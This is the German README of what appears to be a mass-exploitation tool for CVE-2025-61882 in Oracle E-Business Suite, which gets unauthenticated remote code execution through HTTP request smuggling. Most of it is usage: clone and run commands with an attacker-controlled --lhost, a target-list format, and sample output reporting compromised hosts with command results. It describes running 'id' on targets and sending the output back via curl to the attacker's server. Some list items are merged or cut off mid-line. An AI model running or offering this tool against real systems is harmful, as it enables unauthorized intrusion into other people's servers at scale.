
Mehrthread-Scanner für CVE-2025-61882 in Oracle E-Business Suite, der HTTP-Request-Smuggling ausnutzt, um eine nicht authentifizierte Remote-Codeausführung zu erreichen und diese über die Befehlsausgabe zu validieren.
Ein schneller, multithread-fähiger Bulk-Scanner zur Erkennung von CVE-2025-61882 in Oracle E-Business Suite-Installationen. Diese kritische Schwachstelle ermöglicht nicht authentifizierte Remote-Codeausführung.
id-Befehls und Parsen der Ausgabevuln-output.txt geschriebenpip install requests
Das ist alles. Nur Python 3.7+ und die requests-Bibliothek.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
Erstellen Sie eine targets.txt-Datei mit einer URL pro Zeile:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE-Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] 1235 Ziele aus Datei geladen
[*] Läuft mit 20 gleichzeitigen Threads
[*] Verwundbare Hosts werden in vuln-output.txt gespeichert
[*] [1/1235] Prüfe https://target1.com:443 auf Port 7893
[*] [2/1235] Prüfe https://target2.com:443 auf Port 5882
[+] Treffer! 129.146.56.43 ist verwundbar
[+] Befehlsausgabe: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan in 245.67 Sekunden abgeschlossen
[*] 3 verwundbare Ziele gefunden
[*] Vollständige Ergebnisse in vuln-output.txt ansehen
=================================================================
[+] Verwundbare Ziele gefunden:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
Die Ergebnisse werden in vuln-output.txt gespeichert:
# Oracle EBS CVE-2025-61882 - Scan-Ergebnisse
# Gestartet: Di Okt 07 15:30:45 2025
# Gesamtzahl der Ziele: 1235
# Scanner von: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id-Befehl aus und sendet die Ausgabe per curl zurückuid=...gid=...-MusterDieses Tool ist nur für autorisierte Sicherheitstests gedacht. Beachten Sie immer:
Unbefugter Zugriff auf Computersysteme ist illegal.
Einen Fehler gefunden? Eine Funktionsanfrage?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details.
Dieses Tool wird nur für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Nutzung auf eigenes Risiko.
Mit ❤️ für die Infosec-Community erstellt
| Argument | Erforderlich | Standard | Beschreibung |
|---|
--targets | Ja | - | Pfad zur Datei mit den Ziel-URLs |
--lhost | Ja | - | Ihre VPS-/Angreifer-IP-Adresse |
--threads | Nein | 20 | Anzahl der gleichzeitigen Threads |